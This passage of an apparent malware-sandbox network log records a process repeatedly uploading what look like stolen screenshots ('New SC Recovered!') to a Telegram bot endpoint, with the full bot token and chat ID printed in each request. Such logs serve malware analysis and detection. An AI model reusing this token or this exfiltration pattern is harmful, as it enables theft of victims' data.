"#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:19:04 UTC	603	OUT	Data Raw: 5c 4b 7a d1 de 5f 5a af ef 31 b5 4a 0e ab 8c e4 92 32 32 73 9c e2 b9 ad 7e 09 6d b5 eb e8 66 9f cf 95 66 6d f2 ed db bc e7 93 81 d2 a1 b7 d4 b5 0b 59 a4 9a da fa e6 19 65 e6 47 8e 56 56 7e 73 c9 07 9a ac ee f2 3b 3b b1 67 63 96 66 39 24 fa 9a 2c 02 57 53 e1 b9 2e 2d b4 b8 a5 b1 2e b3 cb a9 45 0c 9b 3a b2 6d 38 53 ea 09 ce 47 7c 57 2d 53 da de dd d9 ef fb 2d d4 d0 79 8b b5 fc a9 0a ee 1e 87 1d 45 0c 0e a2 46 79 6c 35 ad 3a de e2 59 12 2c b4 56 b2 2e 22 8e 31 2e 43 46 46 72 c7 20 72 17 86 3c 9a 4b 1b a7 b2 f1 66 93 a6 40 c8 52 d5 d2 07 25 15 be 76 60 64 23 23 83 9e 32 39 c0 ae 7a 2d 5b 52 8a 38 62 4b e9 fc 98 58 3c 71 33 96 8d 48 39 07 69 e3 af b5 56 59 e6 4b 81 70 92 ba cc 1b 78 90 31 0c 1b d7 3e b4 58 77 3b 2d 15 9d 20 d2 a0 8c b0 b5 bb 92 e8 5e 28 fb ae Data Ascii: \Kz_Z1J22s~mffmYeGVV~s;;gcf9$,WS.-.E:m8SG\|W-S-yEFyl5:Y,V."1.CFFr r<Kf@R%v`d##29z-[R8bKX<q3H9iVYKpx1>Xw;- ^(
2024-10-03 07:19:04 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 33 64 63 39 35 65 64 38 62 63 2d 2d 0d 0a Data Ascii: -----------------------------8dcf63dc95ed8bc--
2024-10-03 07:19:04 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:19:04 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49716	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:19 UTC	238	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcfcf98fda5bd4 Host: api.telegram.org Content-Length: 66189 Expect: 100-continue
2024-10-03 07:19:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:19:19 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 66 39 38 66 64 61 35 62 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 66 39 38 66 64 61 35 62 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 30 34 2f 32 30 32 34 20 31 37 3a 34 33 3a 31 34 0a 55 73 65 72 Data Ascii: -----------------------------8dcfcf98fda5bd4Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dcfcf98fda5bd4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/04/2024 17:43:14User
2024-10-03 07:19:19 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:19:19 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:19:19 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:19:19 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:19:19 UTC	603	OUT	Data Raw: 5c 4b 7a d1 de 5f 5a af ef 31 b5 4a 0e ab 8c e4 92 32 32 73 9c e2 b9 ad 7e 09 6d b5 eb e8 66 9f cf 95 66 6d f2 ed db bc e7 93 81 d2 a1 b7 d4 b5 0b 59 a4 9a da fa e6 19 65 e6 47 8e 56 56 7e 73 c9 07 9a ac ee f2 3b 3b b1 67 63 96 66 39 24 fa 9a 2c 02 57 53 e1 b9 2e 2d b4 b8 a5 b1 2e b3 cb a9 45 0c 9b 3a b2 6d 38 53 ea 09 ce 47 7c 57 2d 53 da de dd d9 ef fb 2d d4 d0 79 8b b5 fc a9 0a ee 1e 87 1d 45 0c 0e a2 46 79 6c 35 ad 3a de e2 59 12 2c b4 56 b2 2e 22 8e 31 2e 43 46 46 72 c7 20 72 17 86 3c 9a 4b 1b a7 b2 f1 66 93 a6 40 c8 52 d5 d2 07 25 15 be 76 60 64 23 23 83 9e 32 39 c0 ae 7a 2d 5b 52 8a 38 62 4b e9 fc 98 58 3c 71 33 96 8d 48 39 07 69 e3 af b5 56 59 e6 4b 81 70 92 ba cc 1b 78 90 31 0c 1b d7 3e b4 58 77 3b 2d 15 9d 20 d2 a0 8c b0 b5 bb 92 e8 5e 28 fb ae Data Ascii: \Kz_Z1J22s~mffmYeGVV~s;;gcf9$,WS.-.E:m8SG\|W-S-yEFyl5:Y,V."1.CFFr r<Kf@R%v`d##29z-[R8bKX<q3H9iVYKpx1>Xw;- ^(
2024-10-03 07:19:19 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 66 39 38 66 64 61 35 62 64 34 2d 2d 0d 0a Data Ascii: -----------------------------8dcfcf98fda5bd4--
2024-10-03 07:19:19 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:19:19 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49717	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:22 UTC	238	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcff9d314df993 Host: api.telegram.org Content-Length: 66189 Expect: 100-continue
2024-10-03 07:19:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:19:22 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 66 39 64 33 31 34 64 66 39 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 66 39 64 33 31 34 64 66 39 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 30 38 2f 32 30 32 34 20 30 32 3a 31 39 3a 33 36 0a 55 73 65 72 Data Ascii: -----------------------------8dcff9d314df993Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dcff9d314df993Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/08/2024 02:19:36User
2024-10-03 07:19:22 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:19:22 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:19:22 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:19:22 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:19:22 UTC	603	OUT	Data Raw: 5c 4b 7a d1 de 5f 5a af ef 31 b5 4a 0e ab 8c e4 92 32 32 73 9c e2 b9 ad 7e 09 6d b5 eb e8 66 9f cf 95 66 6d f2 ed db bc e7 93 81 d2 a1 b7 d4 b5 0b 59 a4 9a da fa e6 19 65 e6 47 8e 56 56 7e 73 c9 07 9a ac ee f2 3b 3b b1 67 63 96 66 39 24 fa 9a 2c 02 57 53 e1 b9 2e 2d b4 b8 a5 b1 2e b3 cb a9 45 0c 9b 3a b2 6d 38 53 ea 09 ce 47 7c 57 2d 53 da de dd d9 ef fb 2d d4 d0 79 8b b5 fc a9 0a ee 1e 87 1d 45 0c 0e a2 46 79 6c 35 ad 3a de e2 59 12 2c b4 56 b2 2e 22 8e 31 2e 43 46 46 72 c7 20 72 17 86 3c 9a 4b 1b a7 b2 f1 66 93 a6 40 c8 52 d5 d2 07 25 15 be 76 60 64 23 23 83 9e 32 39 c0 ae 7a 2d 5b 52 8a 38 62 4b e9 fc 98 58 3c 71 33 96 8d 48 39 07 69 e3 af b5 56 59 e6 4b 81 70 92 ba cc 1b 78 90 31 0c 1b d7 3e b4 58 77 3b 2d 15 9d 20 d2 a0 8c b0 b5 bb 92 e8 5e 28 fb ae Data Ascii: \Kz_Z1J22s~mffmYeGVV~s;;gcf9$,WS.-.E:m8SG\|W-S-yEFyl5:Y,V."1.CFFr r<Kf@R%v`d##29z-[R8bKX<q3H9iVYKpx1>Xw;- ^(
2024-10-03 07:19:22 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 66 39 64 33 31 34 64 66 39 39 33 2d 2d 0d 0a Data Ascii: -----------------------------8dcff9d314df993--
2024-10-03 07:19:22 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:19:22 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49718	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:25 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd02a807c14747 Host: api.telegram.org Content-Length: 71082 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:19:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:19:26 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 32 61 38 30 37 63 31 34 37 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 32 61 38 30 37 63 31 34 37 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 31 31 2f 32 30 32 34 20 32 33 3a 32 34 3a 34 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd02a807c14747Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd02a807c14747Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/11/2024 23:24:42User
2024-10-03 07:19:26 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:19:26 UTC	16355	OUT	Data Raw: 46 c1 83 4d fb 2c 1f f3 cc 57 02 c2 49 3b a9 1e 9b c7 45 ab 38 ec 45 61 7f 24 c1 64 d9 a7 a1 fb 59 17 22 61 1a e2 00 06 dd 80 f5 fe 2f bb f3 67 1e d4 db 5b c5 16 16 52 66 cc da a4 17 1e 70 91 90 ce a7 7c 86 35 00 9d c0 f2 3e ef af 3c 62 a7 36 d0 1c 66 35 e2 93 ec 96 ff 00 f3 c9 6a 5e 0a 4f ed 1a ac c6 0b ec 0f 8b 50 82 08 34 e9 1a 5b 52 e9 73 6c de 6e e8 8b 15 39 f3 32 81 77 2e dc e3 2c 49 c8 c8 c5 32 d8 cc 4c a6 73 11 90 b9 c9 87 66 cf 6c 6c f9 7f 2a 3e c9 6f 9c f9 2b 52 a2 2a 0c 28 c0 ad a8 e1 e5 09 f3 b7 73 9f 11 8b 8d 5a 6a 9c 63 6d 85 a2 8a 2b ac e0 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a4 a0 05 a4 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 61 45 14 50 01 49 4b 49 40 05 14 51 40 05 14 51 4c 04 a2 8a 28 18 62 8a 28 a0 02 Data Ascii: FM,WI;E8Ea$dY"a/g[Rfp\|5><b6f5j^OP4[Rsln92w.,I2Lsfll>o+R(sZjcm+(((((((((aEPIKI@Q@QL(b(
2024-10-03 07:19:26 UTC	16355	OUT	Data Raw: 50 01 49 4b 45 00 25 14 51 40 05 14 51 40 c2 8a 28 a0 04 a2 8a 28 00 a4 a5 a4 a0 61 45 14 50 01 45 14 53 00 a4 a5 a4 a0 02 92 96 8a 63 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 62 51 45 14 00 51 45 14 00 51 45 14 00 52 52 d2 50 01 45 14 50 01 49 4b 49 4c 61 45 14 50 02 52 d1 45 00 14 51 45 03 0a 4a 5a 4a 60 14 51 45 00 2a fd e1 f5 ad 4b 8f f5 cd 59 63 ef 0a d3 9f fd 73 56 53 dd 09 6e 32 92 8a 28 2c 28 a2 8a 06 19 a2 8a 28 00 a4 a2 8a 00 5a 29 33 45 00 2d 14 94 50 02 d2 66 8a 28 01 97 1f f1 e9 27 e1 fc ea 1b 2f bc ff 00 4a 9a 7f f8 f5 93 f0 fe 75 05 9f de 7f a5 35 f0 b0 2d d1 45 25 48 0e a2 92 8a 04 2d 2d 36 96 80 16 96 9b 4b 48 05 a3 34 94 50 21 d9 a3 22 93 34 66 8b 05 87 51 4d cd 2d 21 0b 4b 49 45 00 2d 14 66 8a 42 16 ac d9 ff 00 ac 6f f7 1b f9 55 6a b3 69 fe Data Ascii: PIKE%Q@Q@((aEPESc(((bQEQEQERRPEPIKILaEPREQEJZJ`QE*KYcsVSn2(,((Z)3E-Pf('/Ju5-E%H--6KH4P!"4fQM-!KIE-fBoUji
